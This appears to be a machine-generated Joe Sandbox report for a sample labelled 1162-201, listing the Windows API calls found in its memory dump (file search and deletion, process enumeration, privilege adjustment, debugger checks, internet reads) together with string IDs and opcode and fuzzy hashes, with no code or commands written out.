                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98324
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98356
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00C9838C
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C98395
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                      • String ID: *.*
                                                                      • API String ID: 1464919966-438819550
                                                                      • Opcode ID: 9e3b60d65ef9c975ea9d3f6293a2cf06cbf116ff60d184686d9227a0bc6a4307
                                                                      • Instruction ID: f18cfb87b9e79a8386ea9292d4563c544ea199aea27f293e236bac4f35665292
                                                                      • Opcode Fuzzy Hash: 9e3b60d65ef9c975ea9d3f6293a2cf06cbf116ff60d184686d9227a0bc6a4307
                                                                      • Instruction Fuzzy Hash: FC617D715043059FCB10EF64D884A9EB3E8FF89314F04492DF999D7251DB31EA49CB92
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C8D1DD
                                                                      • MoveFileW.KERNEL32(?,?), ref: 00C8D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C8D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8D237
                                                                        • Part of subcall function 00C8D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00C8D21C,?,?), ref: 00C8D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C8D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D264
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 08334d5fc61598e4d3597dec9fabe932be2ad3f285194b4463f2d36f6eeacc82
                                                                      • Instruction ID: a0ca28f4b5b9e6cd379f2dd4203914de4dead61868f2cb3c24074db6529446cb
                                                                      • Opcode Fuzzy Hash: 08334d5fc61598e4d3597dec9fabe932be2ad3f285194b4463f2d36f6eeacc82
                                                                      • Instruction Fuzzy Hash: C3618C31C0115DABCF05FBE0EA92AEDB7B9AF55304F244165E402771A2EB306F09EB65
                                                                      APIs
                                                                        • Part of subcall function 00C816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
                                                                        • Part of subcall function 00C816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
                                                                        • Part of subcall function 00C816C3: GetLastError.KERNEL32 ref: 00C8174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C8E932
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: bca24b24f97498230c13d5779e11b328cc210d20e62a41037ec5ba4d2c58aab3
                                                                      • Instruction ID: 905dc65e19794cc47bb1acca437fb302b66c6f7f24af26bc81eb036cfb5a65e9
                                                                      • Opcode Fuzzy Hash: bca24b24f97498230c13d5779e11b328cc210d20e62a41037ec5ba4d2c58aab3
                                                                      • Instruction Fuzzy Hash: E601F972610211ABEB6436B59CC6FFF729C9714759F194521FC13E31E2D6E09D4093A8
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00C5B9D4
                                                                      • _free.LIBCMT ref: 00C5B9F8
                                                                      • _free.LIBCMT ref: 00C5BB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00CC3700), ref: 00C5BB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C5BC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF1270,000000FF,?,0000003F,00000000,?), ref: 00C5BC36
                                                                      • _free.LIBCMT ref: 00C5BD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: b5742a71cd19eee3336a8aa653c3a12deac8b34ab785dc15addff16e6da3df36
                                                                      • Instruction ID: 5a84e7d6990c66a217f653d2ca5a0c6a1fd62e844788840c1ace39736d38509d
                                                                      • Opcode Fuzzy Hash: b5742a71cd19eee3336a8aa653c3a12deac8b34ab785dc15addff16e6da3df36
                                                                      • Instruction Fuzzy Hash: 73C119799042459FCB209F698C41BBEBFB8EF41311F18419AECA4D7251EB309E89D758
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C8D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D4A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: b1a37533e4eaddecf5d21dd2ec89e26c1556e6c957978e468ed6e6ffd3264d59
                                                                      • Instruction ID: 385d25e6f6c1257ab0328ff290b88138927f1b3211082b7caf5e99394136bb3e
                                                                      • Opcode Fuzzy Hash: b1a37533e4eaddecf5d21dd2ec89e26c1556e6c957978e468ed6e6ffd3264d59
                                                                      • Instruction Fuzzy Hash: 90315E710083959BC304FF64D8919AFB7A8BE95314F444E2DF4E2931E1EB30AA09DB67
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 90cf1ba26d00bf62975b924a9ae21002bcb4040cdfa10c40aba5b848ae528631
                                                                      • Instruction ID: 43c13555841c66877fa6bd66b1aa213a91b926109db9cf76250ab0fd0dc3de05
                                                                      • Opcode Fuzzy Hash: 90cf1ba26d00bf62975b924a9ae21002bcb4040cdfa10c40aba5b848ae528631
                                                                      • Instruction Fuzzy Hash: 31C24B75E046288FDB29CE28CD407EAB7B5EB48306F1441EAD85DE7241E774AF868F44
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C87206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C8723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C8724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C872CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: 8626f16b3ceddf59b46abf067799d27547c56d3f55f638253bf5aaea1336d9b7
                                                                      • Instruction ID: d5b0327e33027e95160419cd793e17905278c56e79f1119325ee889534c93e0b
                                                                      • Opcode Fuzzy Hash: 8626f16b3ceddf59b46abf067799d27547c56d3f55f638253bf5aaea1336d9b7
                                                                      • Instruction Fuzzy Hash: 8A419171604204EFDB15DF54C884B9A7BA9EF84318F2582ADBD05DF21AE7B0DE40CBA4
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C99B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C99C8B
                                                                        • Part of subcall function 00C93874: GetInputState.USER32 ref: 00C938CB
                                                                        • Part of subcall function 00C93874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C93966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C99BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C99C75
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: c2e248b58c127fa6dd3a4c5638fe94252d5d85e4f502652d407a1986aeb5341a
                                                                      • Instruction ID: 6aff522b57f1ce83d6a78a592ed5eaeadd25d96086cd101c02ca496c27fe557d
                                                                      • Opcode Fuzzy Hash: c2e248b58c127fa6dd3a4c5638fe94252d5d85e4f502652d407a1986aeb5341a
                                                                      • Instruction Fuzzy Hash: 1041607194421AAFCF14DF68DC89AEEBBB8FF05310F24416AE815A2191EB309F44DF61
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C39A4E
                                                                      • GetSysColor.USER32(0000000F), ref: 00C39B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C39B36
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID:
                                                                      • API String ID: 3131106179-0
                                                                      • Opcode ID: 39ba9ec05adac6c3d90c153ddedf2f93cf4609453dd84301e9da47b644d41dcb
                                                                      • Instruction ID: 03a94af83d8e82caa44578b9837308fcec1653fad642d7e20d847bc69d824054
                                                                      • Opcode Fuzzy Hash: 39ba9ec05adac6c3d90c153ddedf2f93cf4609453dd84301e9da47b644d41dcb
                                                                      • Instruction Fuzzy Hash: C2A15C71128408EEE729AA3E8C99FBF365DDB42340F154309F522C66A5CAB59F01E272
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00C39141
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: f2d612f701c97f06d2b8780d38e7cd092456866c84bf14511da0517f6a5ab381
                                                                      • Instruction ID: e74605a7a727a6151b12fb8545cd6f26cd1c114154e10a2975436e5db215fb13
                                                                      • Opcode Fuzzy Hash: f2d612f701c97f06d2b8780d38e7cd092456866c84bf14511da0517f6a5ab381
                                                                      • Instruction Fuzzy Hash: C7414D31A0861AFBDF159F64C848BEEB774FB05320F208329E429A7290C7746A54DF91
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 52c6cd12589608198fea65056eba3658f9205864f215dd97056ea64c49d7048e
                                                                      • Instruction ID: a5a96bfed977e70e1e3e8b5d1173b901074d89a05c9299d53b463c763e1e4c45
                                                                      • Opcode Fuzzy Hash: 52c6cd12589608198fea65056eba3658f9205864f215dd97056ea64c49d7048e
                                                                      • Instruction Fuzzy Hash: 00016975200205BFDB115FA8DC8DBAE3BAEEF893A4F240419FA41E3360DA31DD008B60
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                      • API String ID: 0-1546025612
                                                                      • Opcode ID: 9496d5b990d85aeebd087d8d5fb06d5fc52e69a33df2dadc01a37a589759942d
                                                                      • Instruction ID: 52942769dd738d46396b985ca1409def38c0fa05db0c6e187167ab63bafd2c22
                                                                      • Opcode Fuzzy Hash: 9496d5b990d85aeebd087d8d5fb06d5fc52e69a33df2dadc01a37a589759942d
                                                                      • Instruction Fuzzy Hash: 27A2A070E0162ACBDF34CF59D8907ADB7B1BF54310F2481AAE825A7684DB749E85CF90
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C8D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C8D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C8D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C8D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 3dfc21c54ec53ea60ea092ea8224c5ed93f5b817746dd546280d31384283d212
                                                                      • Instruction ID: 590048f85dd6ca1ca63e158975a11d27f885f25e48db3ada6ca8d9e8005e6406
                                                                      • Opcode Fuzzy Hash: 3dfc21c54ec53ea60ea092ea8224c5ed93f5b817746dd546280d31384283d212
                                                                      • Instruction Fuzzy Hash: 3E31A0711083009FD300EF54D881BAFBBF8EF99358F14092DF582961E1EB719A48DBA2
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00C9CE89
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C9CEEA
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00C9CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      • Opcode ID: af15bc6064841c33725ec2c6a7ef2836821a56a594f761ea00915949a51429f4
                                                                      • Instruction ID: 358549eb394765b9d9d9fb1904bf37359ab8212f07cdec5d7764e6c9e23326cf
                                                                      • Opcode Fuzzy Hash: af15bc6064841c33725ec2c6a7ef2836821a56a594f761ea00915949a51429f4
                                                                      • Instruction Fuzzy Hash: CA21ACB1900705EBEF20DFA6C988BABB7FCEB50354F10442EE556D2151E770EE049B60
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00C65222), ref: 00C8DBCE
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C8DBDD
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8DBFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 438a329c50dae272d230189913c443148ddf884473f791442d0290b68eba845d
                                                                      • Instruction ID: 89b52405fd4f394b89de54686912e10796b291827fda286346169963f6f74753
                                                                      • Opcode Fuzzy Hash: 438a329c50dae272d230189913c443148ddf884473f791442d0290b68eba845d
                                                                      • Instruction Fuzzy Hash: BFF0A030810910578320BB7CAC4DAAE376C9E01338F104702F836C20F0EBB05E54879A
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C882AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: a4ab0df9b1c12b301ef34b04e41c07d03ff5680966e89fed698bdda67a113c15
                                                                      • Instruction ID: aadd2488830441c9da988579c04702c6c563a502a193c116ac143f20cc3ed3e9
                                                                      • Opcode Fuzzy Hash: a4ab0df9b1c12b301ef34b04e41c07d03ff5680966e89fed698bdda67a113c15
                                                                      • Instruction Fuzzy Hash: 9C324474A006059FCB28DF19C080A6AB7F0FF48714B51C46EE5AADB7A1EB70E981CB44
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C95CC1
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C95D17
                                                                      • FindClose.KERNEL32(?), ref: 00C95D5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: aefb456aa0a3209d68b184db133a7b1fdae9df5f3deec6f9c68fd3e2dbc8267d
                                                                      • Instruction ID: 5edeeec4ed9fa6ce936d1447d8b6542a1a791b511c6d73e0666b6a92978a406c
                                                                      • Opcode Fuzzy Hash: aefb456aa0a3209d68b184db133a7b1fdae9df5f3deec6f9c68fd3e2dbc8267d
                                                                      • Instruction Fuzzy Hash: 93519B756046019FCB14DF28D498E9AB7E4FF49314F14855EE96A8B3A2CB30ED04CF91
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00C5271A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C52724
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00C52731
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 2ec032e04ecfa874febb1222ecbc25bb1462c83660be26ead833702efef1d8aa
                                                                      • Instruction ID: 028b54ce5e5dbbdbf29b72ea1357bf8aa73367211727cdb3e9c49dfd6f146731
                                                                      • Opcode Fuzzy Hash: 2ec032e04ecfa874febb1222ecbc25bb1462c83660be26ead833702efef1d8aa
                                                                      • Instruction Fuzzy Hash: C631B5759512189BCB21DF64DC89BDDB7B8BF08310F5042EAE81CA7261E7309F859F45
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C951DA
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C95238
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C952A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 5e95f689703b5201e28b96decfa185f94b68a36a3c9723d02de07bab0bf92edc
                                                                      • Instruction ID: ee8ec7c4e8fe9a533462a42ac4c92bc129091adfdd0d252140c5e874c7ef6b9a
                                                                      • Opcode Fuzzy Hash: 5e95f689703b5201e28b96decfa185f94b68a36a3c9723d02de07bab0bf92edc
                                                                      • Instruction Fuzzy Hash: 26312B75A005189FDB00DF94D8C8FADBBB4FF49314F088099E805AB3A2DB31E955CB91
APIs
  • Part of subcall function 00C3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C40668
  • Part of subcall function 00C3FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00C40685
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C8170D
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C8173A
• GetLastError.KERNEL32 ref: 00C8174A
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
